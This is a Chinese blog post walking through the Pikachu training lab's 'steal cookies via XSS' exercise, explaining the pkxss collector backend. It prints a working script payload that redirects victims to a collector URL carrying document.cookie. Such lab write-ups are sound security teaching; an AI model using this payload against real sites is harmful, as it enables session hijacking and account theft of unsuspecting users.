Pikichu-xss实验案例-通过xss获取cookie

已于 2024-10-02 21:14:17 修改
阅读量106 收藏
点赞数
分类专栏: pikachu通关 文章标签: xss 前端
于 2024-10-02 20:45:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanrongl/article/details/142684790
版权

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

什么鬼昵称
关注
专栏目录
java -xss_Java线程与Xss
weixin_31302909的博客
02-12 3827
jvm系列Xss与线程个数Xss越大,每个线程的大小就越大,占用的内存越多,能容纳的线程就越少;Xss越小,则递归的深度越小,容易出现栈溢出 java.lang.StackOverflowError。减少局部变量的声明,可以节省栈帧大小,增加调用深度。/*** -Xss128K deep of calling = 675* -Xss256K deep of calling = 1686*...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
web安全---xss漏洞/beef-xss基本使用
嘿嘿嘿
04-28 1262
xss漏洞----跨站脚本攻击(Cross Site Scripting),攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。
SpringBoot配置XSS过滤器基于mica-xss
靖节先生的博客
04-04 4298
SpringBoot配置XSS过滤器基于mica-xss1. 业务概述1.1 XSS简介1.2 需求概述2. mica概述2.1 mica简介2.1 mica对应springboot版本信息2.2 mica核心功能2.3 mica协议文档3. SpringBoot集成mica-xss3.1 maven依赖3.2 代码实现3.3 测试验证 1. 业务概述 1.1 XSS简介 XSS攻击即跨站点脚本攻击(Cross Site Script),为不和层叠样式表(Cascading Style Sheets, CS
nodejs设置x-xss-protection解决xss问题
热门推荐
qq_43592064的博客
12-21 2万+
nodejs设置x-xss-protection
在kali环境下安装Beef-Xss靶场搭建
weixin_51525416的博客
09-02 1971
在kali环境下安装Beef-Xss靶场搭建
Web 安全之 X-XSS-Protection 详解
路多辛的所思所想
11-27 1936
跨站脚本(XSS)是一种常见的网络攻击,攻击者通过在网站中插入恶意脚本,当用户访问被污染的页面时,恶意脚本会被执行,从而窃取用户的敏感信息、篡改页面内容或者执行其他恶意操作。XSS 攻击分为三种类型:持久型、DOM-based 型和反射型 XSS(非持久型)。持久型 XSS:攻击者在网页中插入恶意脚本,并将其保存到服务器或数据库中。当其他用户访问该页面时,恶意脚本会被执行,从而进行长期的网络攻击。这种类型的攻击比较危险,因为可以长期地影响用户。
X-XSS-Protection
椰汁菠萝
03-18 1万+
HTTPX-XSS-Protection响应头是Internet Explorer,Chrome和Safari的一个功能,当检测到跨站脚本攻击 (XSS)时,浏览器将停止加载页面。虽然这些保护在现代浏览器中基本上是不必要的,当网站实施一个强大的Content-Security-Policy来禁用内联的JavaScript ('unsafe-inline')时,他们仍然可以为尚不支持CSP...
BeEF-XSS实验手记
二歪的防痴呆笔记
04-02 2364
这里使用的是Kali里面预装的BeEF-XSS,在Kali里面打开 应用程序-08-漏洞利用工具集-beef XSS framework。 或者直接运行beef-xss命令运行: kali已经把beef-xss做成服务了,可以使用systemctl 命令来启动或关闭beef服务器 systemctl start beef-xss.service #开启beef systemctl sto...
JVM参数设置-Xss
m0_54850825的博客
08-18 2769
设置栈内存的大小,设置的栈的大小决定了函数调用的最大深度-Xss 设置的大小决定了函数调用的深度,如果函数调用的深度大于设置的Xss大小,那么将会抛“java.lang.StackOverflowError“ 异常,下面我们来演示一下。...
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4448
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
假设一个攻击者想要通过Self-XSS获取某个目标网站上用户的敏感信息或者执行某些操作。他可以构建如上的页面,并通过各种渠道(如社交媒体、邮件等)诱骗目标用户访问该页面。一旦用户访问了该页面,恶意脚本就会被...
js-xss:使用白名单指定的配置对不受信任HTML进行清理(以防止XSS
02-27
xss是用于过滤用户输入以防止XSS攻击的模块。 ( ) 项目主页: : 在线尝试: : 特征 指定HTML标记及其白名单允许的属性 使用自定义功能处理所有标签或属性。 参考 基准(仅供参考) xss模块:22.53 MB / s ...
XSS(内含DVWA)
m0_73902453的博客
09-27 765
反射型 XSS:即时反射,依赖用户点击链接,通常是一次性的。存储型 XSS:恶意代码存储在服务器上,多次执行,影响广泛。DOM型 XSS:常在客户端,通过操控 DOM 元素来执行,无需与服务器交互。
Pikachu-Cross-Site Scripting-反射型xss(get)
guanrongl的专栏
10-02 263
存储型XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类型的XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
Pikachu-Cross-Site Scripting-存储型xss
最新发布
guanrongl的专栏
10-02 99
存储型xss ,随便输入点内容,都能保存下来;输入特殊字符,也能原样返回;查看代码,也可以看到输出结果直接原路返回,不做处理。
XSS基础
2302_81328699的博客
10-01 214
【代码】XSS基础
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值